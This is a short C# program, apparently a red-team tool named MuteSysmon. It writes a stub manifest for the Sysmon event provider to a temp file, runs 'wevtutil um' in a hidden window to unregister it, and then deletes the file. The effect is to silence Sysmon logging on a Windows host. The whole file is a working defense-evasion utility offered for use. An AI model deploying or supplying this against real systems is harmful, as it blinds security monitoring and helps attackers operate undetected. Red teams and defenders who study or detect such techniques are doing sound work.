MuteSysmon.cs

using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Text;

namespace MuteSysmon
{
    class Program
    {
        static void Main(string[] args)
        {

            string manifest = @"
<instrumentationManifest xmlns=""http://schemas.microsoft.com/win/2004/08/events"">
	<instrumentation>
		<events>
			<provider name=""Microsoft-Windows-Sysmon"" guid=""{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"" />
		</events>
	</instrumentation>
</instrumentationManifest>
";

            string tempFilePath = Path.GetTempFileName();

            Console.WriteLine("[*] Writing manifest to temporary file " + tempFilePath);
            File.WriteAllText(tempFilePath, manifest);

            Console.WriteLine("[*] Uninstalling Sysmon event manifest");
            Process uninstProc = new Process()
            {
                StartInfo = new ProcessStartInfo()
                {
                    WindowStyle = ProcessWindowStyle.Hidden,
                    CreateNoWindow = true,
                    FileName = "wevtutil",
                    Arguments = "um " + tempFilePath
                }

            };

            uninstProc.Start();
            uninstProc.WaitForExit();

            Console.WriteLine("[*] Deleting temporary file " + tempFilePath);
            File.Delete(tempFilePath);

        }
    }
}